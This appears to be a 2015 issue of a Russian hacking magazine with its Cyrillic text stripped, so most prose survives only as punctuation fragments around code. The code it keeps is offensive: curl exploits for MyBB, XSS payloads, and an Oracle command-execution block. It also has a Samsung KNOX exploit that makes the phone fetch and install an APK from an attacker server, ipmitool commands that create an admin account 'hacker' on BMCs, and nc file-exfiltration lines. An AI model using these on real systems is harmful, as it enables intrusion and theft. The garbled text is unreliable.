, , Qualcomm
Secure Execution Environment.
,
, HAL masterkey,
TEE. ,

,
,
NAND.
,

,
PIN-
Smart
Lock ( ).
Google ,

,
, .


.
/data
dm-crypt AES-128 CBC ESSIV:SHA256
(IV).
KEK-,
PIN-

01 /192/ 2015

39

SELinux

script (www.tarsnap.com/
scrypt.html),
TEE. , Android 5.0 PIN-, KEK.
script
PIN-
Android 4.4

PBKDF2. GPU (6- PIN 10 , 6-
4 hashcat),
script, , 20 000
GPU .
,
,
Android 5.0. ,
,
.

SEANDROID
SELinux,
,
. SELinux

. SELinux ,
, ,
Apache ,


. , SELinux , , .
Android SELinux SEAndroid (seandroid.
bitbucket.org)

SELinux-
.
4.2, Android, ( 4.24.3)
(
). 4.4
Google
,

(installd, netd, vold zygote). SELinux
5.0.
Android 5.0 60 SELinux ( )
,
init .
,
Android,
root,
, .
, CVE-2011-1823,

Android 2.3.4 memory corruption
vold,
root (
Gingerbreak), -

X-Mobile

40

Smart Lock

01 /192/ 2015

Android 5.0 WebView

, 5.0 , SELinux, vold


. CVE-2014-3100 Android 4.3,
keystore, 70% .
SELinux ,
( ++ ,
root),
root, , . ,
root
, SELinux
.
, , root SELinux- init.
SuperSU 2.23 (
, , init ,
su). recovery, , ,
root (
), .
, SELinux ,
, Android.


Android
4.2, ( , 4.2 Multiple User
Enabler). 4.3
,

INFO
Linux,
Android
MD5-
. Google
,

.

Android Device Manager

, .
Lollipop , . ,
,

. ,
, ,
.
screen pinning, ,
, .

, .

,
,

.
screen pinning - .
, PIN-
. PIN .
, ,
,
, 99%
, , ,
. Samsung Knox.

01 /192/ 2015

,
.

SMART LOCK

41

Google Chrome Android. ,


,
Android 5.0 .

KILL SWITCH

2013 Google -
PIN-
Android Device Manager, , Google .

5.0 Smart Lock,
.


, Google Play Google
.
Services,
Google
, Android 2.3.
,
Android 5.0,
.
Factory Reset Protection.

(Dan Campbell)
. Smart Lock

ChromeOS
,

, ,

Google,

Bluetooth

( ,

.
, TV Box),


NFC- Google
.

.

,
,

,

,
.

, ( Trusted

Bluetooth, ),
root
Tasker,


Pebble (
.
SWApp Link).

ChromeOS. , ,
Android
, PIN-
Android-, , Smart Lock ,
( Trusted Agents) ( Smart Lock ).
Bluetooth-, NFC- .
HTTPS TLS/SSL.

INFO
Android 5.0 TLSv1.1
Smart Lock.
TLSv1.2. ,
Forward Secrecy. ,
Android
AES-GCM,
. , , /
, ,

(MD5, 3DES) .
.

PIE . Android ,
WEBVIEW
.
Android PIE (Position-Independent Executables).
WebView WebKit, FORTIFY_SOURCE.
HTML/JS-
, stpcpy(), stpncpy(), read(), recvfrom(),
.
FD_CLR(), FD_SET() FD_ISSET(), . KitKat WebView
FORTIFY_SOURCE
GCC ( ). Chromium ( 33 Android 4.4.3),
FORTIFY_SOURCE
Android 4.2.
Google

-.
Google Android 5.0 ,
Lollipop, WebView
Chromium, Google
, ,
Play ( , : ). ,
Android
,
HTML/
root. , ,
JS-, , Lollipop
. , Google Android .
, -

42

X-Mobile

01 /192/ 2015

: VPN-, , ,
,
Opera Mini .

#3.

ONAVO EXTEND

AFWALL+

OPERA MINI

ADAWAY

4.0, Android
VPN.
, . Onavo
Extend VPN,
,
.

HTTP, ,

- .
AJAX , ,
, ,
.
,
Opera. Opera Max,
iOS Android.



,
, .
,
,
.
Android
,
iptables, .
AFWall+ .
: ,
( )
Wi-Fi
3G, .
iptables.
: root
.



. Android
,
.

,
.

Adblock,
AdAway.
AdAway ,
VPN, /system/etc/
hosts.
DNS-
.

Onavo Extend: goo.gl/YYA1j


: Android/iOS
:

AFWall+: goo.gl/eH7yb
: Android
: / open source


- .
,
, Opera Mini
.
Opera Mobile,
.

Opera
Mini
,
.
Opera Mini
HTML, JS, CSS.
OBML (Opera
Binary Markup Language),

Opera HTML OBML JavaScript .
OBML 90%,
,
- .
Opera Mini: goo.gl/9PoS31
: Android / iOS / Windows Phone
:

AdAway: goo.gl/2Qacc
: Android
:

10 /177/ 2013

43

Raspberry Pi

, .
Hint: .

44

01 /192/ 2015

EASY
HACK
GreenDog , Digital Security
agrrrdog@gmail.com,
twitter.com/antyurin

WARNING


. ,
, .

01 /192/ 2015

45

Easy Hack

ORACLE DB XE

, ( TNS)
SQL- -. ,
, , . Java.
. ,
Oracle, Express Edition (XE),
Jav Virtual Machine -. ?
! , .

begin
DBMS_SCHEDULER.create_program('any_name','EXECUTABLE',
'echo "any commands with parameters"',0,TRUE);

DBMS_SCHEDULER.create_job(job_name=>'any_job_name',
program_name=>'any_name',
start_date=>NULL,repeat_interval=?
>NULL,end_date=>NULL,enabled=>TRUE,auto_drop=>TRUE);
dbms_lock.sleep(1);
dbms_scheduler.drop_program(program_name=>'any_name');
dbms_scheduler.purge_log;
end;
, . .
.
, ,
, .

? CHEATSHEET. - ,

,
:)

,
. -, , ,
, -. , . , , Internet Explorer
, Easy
Hack () .
Shazzer. ,
(=)
,
.
.
, , , (
.
, ) Android.
. , , Same Origin Policy. , SOP
- XSS, JavaScript . , ,
. ( , ,
, + + )
. ,
.
/ (,
SOP, , (http://evil.ru, ),
<svg/onload=alert(1)>), IE

`. , .
. , SOP ? -, cheatsheet,
:
(, OWASP: goo.gl/Ne8nGI).
<iframe name="test" src="http://gmail.com"></iframe>
-, . Shazzer (goo.gl/z0SrxG). -
<input type=button value="test" onclick="window.open
('\u0000javascript:alert(document.domain)','test')" >
. - . ,
http://evil.ru,
. , -, ,
(alert(document.domain)) Gmail. iframe ,
, -, ,
(input , ).
, , -
, (
.
SOP), ,
, ( ),
. \u0000 null-, . , , - ,
-
.
. , Android 4.4
: goo.gl/urMpHC.

46

JS
- . , .
, ,
.
-, , - . ,

XSS

JS

.

,
(, XSS).
.
, (
,
, ):
HTML, JavaScript.
, , ,
HTML-, JS.
?
,

. , HTML- JS, HTML
. ,
, &gt;,
&lt;, <, > ( , , ). , ,

.
.
, ( , , , ).
?
Telnet. ,
. , , PIN-.
, , : PAN ( ), expiration date CVV (
), .
,
. ,
, . ? , .

01 /192/ 2015

JavaScript : , , , , . ,
,
, . XSS. : goo.gl/vyEVAr.
Retire.js (goo.gl/qz6FZn).
. .
: , , Burp ZAP. rocket science, .

. , . , .
&gt; &#60;, X &#88;.
, x .
&#x3C; &#x58;. .
, .
(< &#60;),
(script scr&#105;pt) (onload on&#108;oad).
JavaScript HTML,
HTML-. :

<img src=x onerror=&#000097;lert(&#x32;);>


onerror alert(2). a .
, <script>
( HTML-).
JavaScript. . -,
escape-, \t, \r, \n. -, . , \141. : x
( \x61), u , 4
( \u0061).
, .
.
, (, , , ). :

<script>\u0061lert("\141\t\x62");</script>
, , ,
. , ,
.

, Visa/MasterCard NFC (PayPass, PayWave).


( 25%)
. , , .
c NFC, c NFC- (, ) . : PAN, exp date, Card Holder ( ),
, 20 , . ,
, CVV .
, . , ,
.
...
, CVV
, 3D Secure .
NFC, Banking card reader (goo.
gl/7dmjrH). Hackito Ergo Sum 2012: goo.gl/omSbfi.

01 /192/ 2015

47

Easy Hack

CROSS-SITE WEBSOCKET HIJACKING

, . HTML5
, , -.
- , TCP.
HTTP, -,
TCP-, , TCP-.
-,
( ).
. - ,
-, HTTPS . ws://
wss:// . - ( ) , .
, - GET - .
(
Host):

GET / HTTP/1.1
Host: victim.ru
Origin: http://evil.org
Sec-WebSocket-Key G54JzsUvsF7FWpzopP2HRw==
Sec-WebSocket-Version: 13
Connection: Upgrade
Upgrade: websocket
-

-. ,
( , ). Origin, , .
:

HTTP/1.1 101 Web Socket Protocol Handshake


Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: content-type, x-websocket
-extensions, x-websocket-version, x-websocket-protocol
Access-Control-Allow-Origin: http://victim.ru
Sec-WebSocket-Accept: 5Lw1/qhX7PKx66t9+Rn+bV3x4Jg=?
Upgrade: websocket
.
CORS,
, . ,
- ( TCP-),
. : , , .
-
, SOP
.
, , , (
), -
. , -

- IronWASP

( , , 404, web/char ).
, , Cross-Site WebSocket Hijacking. .
, (origin) -
- ( ).
: -, -
- . -,
(
HTTP-), GET-, . , CSRF, -,
- .
. ,
. , Access-Control-Allow-Origin, :
, , -,
- . , , . , -.
, Origin ,
, . , ,
, - , , Origin .
: CSWSH CSRF-, .
, ,
.
, : CSWSH ?
, . XSS, JS
. , -
CSRF. , -
, , , ,
.
. , Burp (1.6)
,
- . ZAP
IronWASP (www.ironwasp.org).
- goo.gl/vMiOsu.
!

48

01 /192/ 2015

,
dukebarman.pro,
b.ryutin@tzor.ru,
@dukebarman


-
, , Android Samsung , , .

MYBB 1.8.2
CVSSv2: N/A
: 8 2014
: Taoguang Chen, Avinash Kumar Thapa
CVE: N/A
, PHP- MyBB , , .
, register_globals , MyBB
unset_globals(), PHP, $_POST, $_GET, $_FILES $_
COOKIE:

if(@ini_get("register_globals") == 1)
{

$this->unset_globals($_POST);
$this->unset_globals($_GET);
$this->unset_globals($_FILES);
$this->unset_globals($_COOKIE);
}
...
}
...
function unset_globals($array)
{
if(!is_array($array))
{
return;
}
foreach(array_keys($array) as $key)
{
// - zend_hash_del_key_or_index
PHP <4.4.3 <5.1.4

01 /192/ 2015

49

unset($GLOBALS[$key]);
unset($GLOBALS[$key]);
}
}
.

foo.php?_COOKIE=1,
$_GET['_COOKIE'].
, $_GET['_
COOKIE']=1, $GLOBALS['_COOKIE']:

$this->unset_globals($_GET);
...
}
...
function unset_globals($array)
{
...
foreach(array_keys($array) as $key)
{
unset($GLOBALS[$key]);
, $_COOKIE . , , PHP, $_COOKIE ,
:

$this->unset_globals($_COOKIE);
}
...
}
...
function unset_globals($array)
{
if(!is_array($array))
{
return;
}
$_GET $_FILES ,
unset_globals(), ,
PHP, .
$_POST['GLOBALS'], $_
FLIES['GLOBALS'] $_COOKIE['GLOBALS'].

$GLOBALS['GLOBALS'].
, $GLOBALS['key']
.
- ,
. , $_GET, $_FILES $_COOKIE .
:

$protected = array("_GET", "_POST", "_SERVER",


"_COOKIE", "_FILES", "_ENV", "GLOBALS");
foreach($protected as $var)
{
if(isset($_REQUEST[$var]) ||
isset($_FILES[$var]))
{
die("Hacking attempt");
}
}
,
.
$_REQUEST , $_GET, $_POST
$_COOKIE.
PHP 5.3 :

request_order = "GP"
php.ini.
$_REQUEST $_GET
$_POST $_COOKIE.
$_COOKIE['GLOBALS'] unset_globals()
PHP 5.3.
:

class MyBB {
...
function __destruct()
{
if(function_exists=("run_shutdown"))
{
run_shutdown();
}
}
}
run_shutdown():

function run_shutdown()
{
global $cong, $db, $cache, $plugins,
$error_handler, $shutdown_functions,
$shutdown_queries, $done_shutdown, $mybb;
...
//
shutdown,

if(is_array($shutdown_functions))
{
foreach($shutdown_functions as function)
{
call_userfunc_array
($function['function'],
$function['arguments']);
}
}
$done_shutdown = true;
}
$shutdown_functions
add_shutdown() init.php:

//

shutdown- ,


add_shutdown('send_mail_queue');

add_shutdown() :

function add_shutdown($name, $arguments=array())


{
global $shutdown_functions;
if(!is_array($shutdown_functions))
{
$shutdown_functions = array();
}
if(!is_array($arguments))
{
$arguments = array($arguments);
}
if(is_array($name) && method_exists
($name[0], $name[1]))
{
$shutdown_functions[] =
array('function' => $name,
'arguments' => $arguments);
return true;
}
else if(!is_array($name) &&
function_exists($name))
{
$shutdown_functions[] =

WARNING


. ,

,
.

50

array('function' => $name,


'arguments' => $arguments);
return true;
}
return false;
}
, , $shutdown_functions
- , .

EXPLOIT
,
:

request_order = "GP"
register_globals = On
. phpinfo():

$ curl --cookie "GLOBALS=1; shutdown_functions[0]


[function]=phpinfo; shutdown_functions[0]
[arguments][]=-1" http://www.target/

01 /192/ 2015

require_once "./inc/init.php";

$shutdown_queries ,
SQL-.
request_order = "GP" register_globals =
On:

$ curl --cookie "GLOBALS=1; shutdown_queries[]=


SQL_Inj" http://www.target/css.php
disable_functions = ini_get register_globals = On:
css.php?shutdown_queries[]=SQL_Inj
, (Taoguang Chen) 6 security-,
.
,
. .
, XSS
. :

*User CP >Edit Prole > **Custom User Title*


, PHP
:

disable_functions = ini_get

<img src=x onerror=alert('XSS');>

unset_globals , register_globals:

/upload/calendar.php,
.
alert-.

if(@ini_get("register_globals") == 1)
{
$this->unset_globals($_POST);
$this->unset_globals($_GET);
$this->unset_globals($_FILES);
$this->unset_globals($_COOKIE);
}

TARGETS
MyBB <= 1.8.2;
MyBB 1.6 <= 1.6.15.

SOLUTION
.

disable_functions = ini_get
register_globals = On:

index.php?shutdown_functions[0][function]=
phpinfo&shutdown_functions[0][arguments][]=-1
, run_shutdown() SQL:

function run_shutdown()
{
global $cong, $db, $cache, $plugins,
$error_handler, $shutdown_functions,
$shutdown_queries, $done_shutdown, $mybb;
...
//


shutdown-
if(is_array($shutdown_queries))
{
//


foreach($shutdown_queries as $query)
{
$db->query($query);
}
}
global.php:

$shutdown_queries = array();
global.php,
css.php:

SAMSUNG GALAXY KNOX ANDROID


BROWSER
CVSSv2: N/A
: 12 2014
: Quarkslab
CVE: N/A
Quarkslab Samsung
Galaxy S5 , .
UniversalMDMApplication, . Samsung Galaxy
S5 ROM ( ) Samsung KNOX.

, ,
, , .

, , , .
( )
HTML-, Chrome
.

01 /192/ 2015

51

MITM-, JavaScript- HTML, .


UniversalMDMClient Samsung KNOX
,
URI smdm://. AndroidManifest.xml :

<manifest android:versionCode="2"
android:versionName="1.1.14" package=
"com.sec.enterprise.knox.cloudmdm.smdms"
xmlns:android="http://schemas.android.com/apk/res/
android">
<uses-sdk android:minSdkVersion="17"
android:targetSdkVersion="19" />
[...]
<uses-permission android:name="android.
permission.INSTALL_PACKAGES" />
[...]
<application android:allowBackup="true"
android:name=".core.Core">
<activity android:congChanges="keyboard|
keyboardHidden|orientation" android:
excludeFromRecents="true"
android:label="@string/titlebar" android:
name=".ui.LaunchActivity"
android:noHistory="true" android:theme=
"@android:style/Theme.DeviceDefault">
<intent-lter>
<data android:scheme="smdm" />
<action android:name="android.intent
.action.VIEW" />
<category android:name="android.intent.
category.DEFAULT" />
<category android:name="android.intent
.category.BROWSABLE" />
</intent-lter>
</activity>
[...]
</application>
</manifest>
intent-lter, com.sec.
enterprise.knox.cloudmdm.smdms.ui.LaunchActivity.
smdm:\\... onCreate LaunchActivity.
proguard, . -
.
, ,
PreETag.xml
/data/data/com.
sec.enterprise.knox.cloudmdm.smdms/shared_prefs/ getPreETAG(): ,
nish(). .
Intent,
Activity, , . :

smdm://hostname?var1=value1&var2=value2

:
seg_url;
update_url;
email;
mdm_token;
program;
quickstart_url.
, ,
update_url.

onCreate


onCreate
Core.
startSelfUpdateCheck()

Core.
startSelfUpdateCheck()

shared_preference, onCreate() Core.startSelfUpdateCheck().


Core.startSelfUpdateCheck() ,
, , UMCSelfUpdateManager.
startSelfUpdateCheck()
, -, URL,
umc_cdn shared_pref-
m.xml, /latest. umc_cdn Intent udpdate_url.
.
UMCSelfUpdateManager.doUpdateCheck() URL.
ContentTransferManager
HTTP-, URL, . handleRequestResult : onFailure(),
onProgress(), onStart(), onSucess() .

52

01 /192/ 2015

UMCSelfUpdateManager.
startSelfUpdateCheck()

, , onSucess().
, : ETag, ContentLength x-amz-meta-apk-version.
x-amz-meta-apk-version
UniversalMDMApplication APK-. , . ,
.
.
YES,
UMCSelfUpdateManager.onSuccess(), GET-
APK-. beginUpdateProcess() updateThread.
, run
updateThread installApk, _installApplication().
: , APK- ,
. , -


Samsung

updateThread


_installApplication()

UMCSelfUpdateManager.
doUpdateCheck()


onSucess()

01 /192/ 2015

53

.
:

Settings$Global.putInt(InstallManager.mContext.
getContentResolver(), GlobalSettingsAdapter.
PACKAGE_VERIFIER_ENABLE_0);
, ,
,
,
, . .
:
- ,
ETag, :

/data/data/com.sec.enterprise.knox.cloudmdm.
smdms/shared_prefs/PreETag.xml
onCreate() , , .

Samsung
Samsung KNOX

EXPLOIT
, . HTML-
JavaScript- ( ):

Metasploit- :

<script>
function trigger(){
document.location="smdm://meow?
update_url=http://yourserver/";
}
setTimeout(trigger, 5000);
</script>
, JavaScript-, ,
(
). :
x-amz-meta-apk-version ,
, . , 1337;
ETag MD5- APK-;
Content-Length APK- ( ).
Python- :

import hashlib
from BaseHTTPServer import
BaseHTTPRequestHandler
APK_FILE = "meow.apk"
APK_DATA = open(APK_FILE,"rb").read()
APK_SIZE = str(len(APK_DATA))
APK_HASH = hashlib.md5(APK_DATA).hexdigest()
class MyHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-Length",
APK_SIZE)
self.send_header("ETag", APK_HASH)
self.send_header
("x-amz-meta-apk-version", "1337")
self.end_headers()
self.wle.write(APK_DATA)
return
def do_HEAD(self):
self.send_response(200)
self.send_header("Content-Length",

APK_SIZE)
self.send_header("ETag", APK_HASH)
self.send_header
("x-amz-meta-apk-version", "1337")
self.end_headers()
return
if __name__ == "__main__":
from BaseHTTPServer import HTTPServer
server = HTTPServer(('0.0.0.0',8080), MyHandler)
server.serve_forever()

msf > use exploit/android/browser/


samsung_knox_smdm_url
msf exploit(samsung_knox_smdm_url) >
set LHOST 192.168.41.186
msf exploit(samsung_knox_smdm_url) > exploit
(bit.ly/1yWD0DX)
.

TARGETS

Samsung Galaxy S5;


Samsung Galaxy S4 (version checked: I9505XXUGNH8);
Samsung Galaxy S4 mini (version checked: I9190UBUCNG1);
Samsung Galaxy Note 3 (version checked: N9005XXUGNG1);
Samsung Galaxy Ace 4 (version checked: G357FZXXU1ANHD).

SOLUTION
,
, . , : ,
(
UniversalMDMClient), ,
.
.
. ( bit.ly/1AK3OGR):

smdm://patch/

Samsung UMC (Universal MDM Client) :

http://umc-cdn.secb2b.com:80
UniversalMDMClient.apk. (Samsung
Galaxy S5, Note 4 Alpha).
...
;).

54

01 /192/ 2015

photonewman@shutterstock.com

,
Positive Technologies
vshilnenkov@ptsecurity.com

IPMI/BMC
IPMI,
IPMI.
IPMI/BMC
IPMI , , . .
BMC IPMI. (system on a chip)
.
, ,
.
Integrated Lights Out (iLO) Hewlett-Packard (HP). HP iLO
BMC/IPMI. , . , , ARM Linux .


:
Reset / /
, .
IPMI/BMC .
, ,
.

:
- ( );
IPMI over LAN (UDP 623);
( ,
). : WMI , OpenIPMI, IPMItool Linux.
- . , .
, .
IPMI over LAN, , UDP 623.
IPMI ,
/dev/ipmi0, .
IPMI IPMItool
GNU/Linux, .

01 /192/ 2015

55

IPMI Authentication Bypass via Cipher 0

. IPMI 2.0.
.
,
.

IPMI/BMC
IPMI/BMC 2013 ,
. IPMI/BMC
shodanhq.com ( . . .). ,
. .
IPMI/BMC.
IPMI/BMC ( , ),
VirtualConsole (aka KVM) , , roota LiveCD
, Windows. , root (
). , IPMI . IPMI/BMC

, .
IPMI/BMC.
IPMI/BMC . , IPMI/BMC .
. , , .

IPMI/BMC

UDP 623, IPMI 2.0, .

PC
metasploit - auxiliary/scanner/ipmi/ipmi_cipher_zero
ipmitool I lanplus C 0 H targetIP U
Administrator P anypasswordhere user list

IPMI 2.0 RAKP Authentication Remote Password Hash


Retrieval



. IPMI 2.0

UDP 623, IPMI 2.0 user-logins.

PC
metasploit - auxiliary/scanner/ipmi/
ipmi_dumphashes
http://sh2.com/ipmi/tools/rak-the-ripper.pl

IPMI Anonymous Authentication / Null user

- null user, - anonymous authentication.


- , - null user / anonymous ( ).
null user, .
anonymous authentication, admin IPMI Chips with ATEN-Software.
(bit.ly/1iZItyM)
. Rapid7 (bit.ly/1kAtHVh)
null user .

,
.

NULL authentication

.
IPMI 1.5.
, . ,
.

HP;
Dell;
Supermicro.

UDP 623, IPMI 1.5, .

PC
ipmitool -A NONE -H targetIP bmc guid

HP;
Dell;
Supermicro.

IPMI BMC
(Dan Farmer) (bit.ly/1fx1wAW). ,
,
: bit.ly/1zthsgv.
.
, IPMI/
BMC :
(,
-);
IPMI.

HP;
Dell;
Supermicro.

HP;
Dell;
Supermicro ( IPMI Chips with ATEN-Software).

WARNING


. ,

,
.

UDP 623.

PC
metasploit - auxiliary/scanner/ipmi/ipmi_dumphashes
ipmitool -I lanplus -H targetIP -U '' -P '' user list

Supermicro IPMI UPnP Vulnerability

Supermicro UPnP SSDP UDP


1900. .

56

01 /192/ 2015

Supermicro.

IPMI

1900.

PC
metasploit exploit/multi/upnp/libupnp_ssdp_overflow
metasploit auxiliary/scanner/upnp/ssdp_msearch

Supermicro IPMI Clear-text Passwords

IPMI 2.0 , -
. Supermicro /nv/PSBlock /nv/PSStore,
firmware.
, BMC Nuvoton WPCM450
TCP- 49152 ,
/nv, PSBlock,
server.pem .

Supermicro.

Shell-?

PC
cat /nv/PSBlock
echo GET /PSBlock | nc targetIP 49152
NULL authentication / IPMI
Authentication Bypass via Cipher 0, IPMI 2.0 RAKP
Authentication Remote Password Hash Retrieval, IPMI
Anonymous Authentication IPMI. , . ,
UPnP- Supermicro (Supermicro IPMI
UPnP Vulnerability), CVE-2012-5958 (BoF libupnp).
Supermicro
Supermicro X9, ,
.

HANDS-ON LAB
IPMI. ipmi_version,

John the Ripper



oclHashcat

Metasploit,
. / Metasploit , ipmiping
rmcpping.
IPMI,
Authentication
Bypass via Cipher 0 ( ). ,
.
: , .

.
Metasploita ipmi_dumphashes
. :

. ipmi_dumphashes , , . ,
, .
oclHashcat, John the
Ripper c jumbo- (community edition).
( . . .), .
oclHashcat, 1.30,
.
HP iLO4, . ,
Administrator uppercase + numeric.
.
cipher 0
. IPMItool. GNU/Linux . Windows
Cygwin. :
1. , ,
ID.

01 /192/ 2015

57

, ? .
, , ipmicd C
Windows/Linux.

IPMI/BMC, ( ipmi_dumphashes
Metasploit). ,
Metasploit ,
IPMI/BMC - , Metasploit .
GitHub (bit.ly/12GLwLA). :
1. -p ,
.
2. -d .
3. -v N
0..5. N = 1 .
, . ,
-d -p
, IPMI-. -d
, . - ,

ipmitool I lanplus C 0 H 1.1.1.1 U


Administrator P anypasswordhere user list
2. .

ipmitool I lanplus C 0 H 1.1.1.1U Administrator


P anypasswordhere user set name <ID> hacker
3. .

ipmitool I lanplus C 0 H 1.1.1.1 U


Administrator P anypasswordhere user
set password <ID> hackerpass
4. .

ipmitool I lanplus C 0 H 1.1.1.1 U


Administrator P anypasswordhere user priv <ID> 4
5. .

ipmitool I lanplus C 0 H 1.1.1.1 U


Administrator P anypasswordhere user enable <ID>

HP KVM

,
, -, SSH SMASH , - KVM.
KVM,
,
BIOS, . KVM . , HP
iLO4 TCP 17988 17990. Dell
iDRAC7 TCP 5900. Cisco ICM TCP 2068.
, HP BladeSystem Onboard
Administrator. HP BladeSystem ,
-. , -
IPMI.
IPMI SSO. ,
, - :).
, HP
iLO4, KVM SMASH (: SSH) TEXTCONS.
, 80, 443, 17990.

HP BladeSystem
Onboard Administrator

-v 5
.
Linux GCC
gcc ipmicd.c -static -o ipmicd.
Windows MinGW gcc
ipmicd.c -mno-ms-bitelds -lws2_32 -DMINGW.
, PoC LiveCD (bit.
ly/1z1woEg), Windows.

LiveCD.

: IPMI/BMC .
- SMASH,
,

IPMI/BMC .
, IPMI/BMC.

BMC .

. ,
-
, .
Stay tuned!

58

01 /192/ 2015

?

BOF


white hat, security, ZeroNights
.
Principal Security
Engineer Nokia,
HERE.
alexey.sintsov@here.com

, ,
, . - / , , , ,
, , . ,
.


,
,
/,
. : , ( ), ,

.

, ,
,
CERT .
, ,
. ,
, ,
1988
,
.
, , ,
1988 ,

1972 ! (
, ) Computer Security Technology
Planning Study. -

,
(csrc.nist.gov/
publications/history/ande72.pdf).

, .
( HeartBleed) . 1972
, 2014-
. , .
,
80- , 90- .
, 1961- 1988-
, ,
( )
, .
80-

, , .
,
( ) ,
,
: .
,

, .
,
, , . :


,
.
- 1990-, 2000-.
,
: . , 1972 ,
1988 . , 26
, ,
,

(19031957). , BoF

01 /192/ 2015

59

( , ,
, ).
, ,
.

, 1972- 1988- , .
, BBS
, .
, - ,

, 1988 ,
. . .
,
,
, 1990 (ftp://
ftp.cs.wisc.edu/paradyn/technical_papers/fuzz.
pdf). ,
, , .
,
(, ), .
,

(. 1965). , BoF

1995
(seclists.org/bugtraq/1995/Feb/109). NCSA HTTPD ,
,
HTTP-, 1993
bugtraq. . , , 1995
. ,
, , , , .
. ,
, , , , , .
1996 , ,
www.phrack.org/issues/49/14.
html#article. ,
. , ,

,
. ,
,
, .

,
. ,
,
( ),
,
- .
1998 ( )
USENIX Security Symposium
StackGuard stack canaries. :

. ,
, : c
,
, .
- , ,
.
2001 , , ,
. , ,
2000-:
, SEH-,
NX . , ,

,
(
, ). Open Source,
MS, , , DEP, PIE, FORTIFY.
,
( ) .
,
, ,
, ,

.
2000-

(Windows/*nix
). ,
2000- . ,
2000-
2000-,

, ( , ).

BoF ( ,
), (
), ( , , EMET) (, , 2005
NX-).
-

, , ,
, .
, -
( , ).
, ,
1972- 2014-

.
1996 2012 ( ),
, , (
).
,
, , ,
.

,
BoF, .
Google Microsoft, ,
, . .
8090-
, , ,
, (
),
. ,
,
.
, - . ,

,
. , ,
, , , .
.
C , , ,
,
.
,
,
, RCE
. , ,
: ,
. , BoF ,
.
QNX ARM-
( ) NX, ASLR. , ,
, . , , ,
SDLC, , , !

60

01 /192/ 2015

JoAnn Gould@shutterstock.com

ant
ant@real.xakep.ru

01 /192/ 2015

61

62

01 /192/ 2015

,
Windows. , . , , . ,
, ,
. ? , ...

PREFASE
( ),
.
, . ,
,
. . ,
- , ,

, .
, .
, Windows, - ,
.
, .


Linux .
.
Windows, c ,
.
Linux- .
?

, . ,
. ,
,


(, , ,
).
:
1. .
2.

.
3. .
4. ( ) .
5. root.
.

, ,
, .
uname -a .

,
, *-release, etc ( -: lsb-release Ubuntu,
redhat-release Red Hat / CentOS ):

WARNING


. ,

,
.

cat /etc/*-release
,
.



, . , , exploit-db.
com, : 1337day (bit.ly/12e2Erd),
ExploitSearch
(bit.
SecuriTeam
(bit.ly/1wOdrFI),
ly/1yYgrxM), Metasploit (bit.ly/1u42z0n), securityreason
(bit.ly/1s8XRhr), seclists (bit.ly/1u8f1LI). ,
, .
, :
, . ,
:

- .
. .
. , ( tmp
). -
, grsecurity (bit.ly/1wcJIa3).

63

01 /192/ 2015

www.cvedetails.com
packetstormsecurity.org/files/cve/[CVE]
cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
www.vulnview.com/cve-details.php?cvename=[CVE]

, , ,
.
- .


,
, cURL/
wget, Netcat, FTP, SCP/SFTP, SMB
DNS TXT . ,
, :

nd
nd
nd
nd
nd

/
/
/
/
/

-name
-name
-name
-name
-name

wget
nc*
netcat*
tftp*
ftp

, Netcat.
:

nc -l -p 1234 > out.le


1234. :

nc -w 3 [destination] 1234 < out.le


*nix- *nix, ,
. :


:
1. LinEnum (bit.ly/15VINz5) bash-,
, ,
cheat sheete (bit.ly/1G0sHPv).
65 , SUID/GUID-. ,
, -. : ./LinEnum.sh -k keyword -r report -e /tmp/ -t.
, ,
.
2. LinuxPrivChecker (bit.ly/1G0utA2) Python-,
. -,
: , ... , , , , .
:).
3. Unix-privesc-check (bit.ly/1q9eFch)

Linux, Solaris, HPUX, FreeBSD. , .
4. g0tmi1ks Blog (bit.ly/12OU82M) ,
, .
, , .

nc -l -p 1234 | uncompress -c | tar xvfp //



tar cfp - /some/dir | compress -c | nc -w 3

[destination] 1234 //
, wget, FTP
.

, , .
? , , .
, - . , (, .secret_folder),
. . , : /tmp/.nothingthere/
exploit.c. ,

, tmp noexec

( mount).


,
/. , Python/Perl/PHP. ][ ,

, .
gcc -v
bash gcc: command not found, ,
. , - ,


.

,

64

01 /192/ 2015

.

(,

,
,
).
,
,

.
,
:

nd
nd
nd
nd

/
/
/
/

-name
-name
-name
-name

perl*
python*
gcc*
cc


LinEnum


. , , .

sudo nd / -xdev \(-perm 4000\) -type f


-print0 -exec ls -s {} \;

, ,
,
, ,
, . , Microsoft
Windows, ,
.
,

:

nd / -perm 2 !
-type l -ls

,
- :
, /, , init
cron. ,
,
, .
, / /
. , ,
chmod 777.
, .

Setuid + setgid
, setuid setgid
,
( root).
,
, -

. ,
setuid ls
,
.
vim
,
.
,
setuid/setgid, , buffer
overflow command
injection,
.
.

Unix-privesc-check

, sudo,
, , .

. ,
, (, ).


. command injection.

, .

SUDO
sudo (substitute
user and do),
,
.


root ( ),
, .

/etc/sudoers. .
, . , ,
.

( Offensive security, : bit.ly/1A62EUU).

01 /192/ 2015

65

PATH
,
.
PATH ( printenv ). ?
, : , PATH . (.:/bin:/usr/sbin
....)? ,
,
: $ program $ ./program.
. PATH / . :

PATH=.:${PATH}
export PATH
,
: () . ,
sudo- , . ,
. PATH.
,

LinuxPrivChecker

,

Exploit
Database

, ls ,
. , ,
, , .
, :
1. . PATH.
2. - , .bashrc .prole:

PATH=`echo $PATH | sed -e 's/::/:/g;


s/:.:/:/g; s/:.$//; s/^://'`

AFTERWORD
, Linux .
: , ,
, .
, , , win-, nix. !

: ,
, ,
. ,
,

66

01 /192/ 2015

WARNING
! ! , !

X-TOOLS

D1g1
Digital Security
@evdokimovds


: Nicolas
Economou
: Windows
URL: https://github.
com/CoreSecurity/
Agafi

: Katja Hahn
: Windows/
Linux
URL: https://
katjahahn.github.io/
PortEx/

: Vu Quoc Huy
: Linux
URL: https://github.
com/c633/malwaRE

ROP

PORTEX

MALWARE REPOSITORY FRAMEWORK

ROP-- . ,
? ,
, .
, ? , ,
ROP-.

ROP- DEP.
Agafi (Advanced Gadget Finder) /
++ ROP-
( ). ,
, EEREAP. .
QEMU
diStorm3.
:
agafi ROP-
( );
agafi-rop ROP-
DEP ( kernel32.VirtualProtect);
gisnap fsnap
.

PortEx Java- PE, . PE-.


Java Scala.
:
MS DOS
Header, COFF File Header, Optional Header,
Section Table;
: import section,
resource section, export section, debug section,
relocations, delay-load imports;
sections, overlay, embedded ZIP, JAR
class ;
,
;
PE-
;
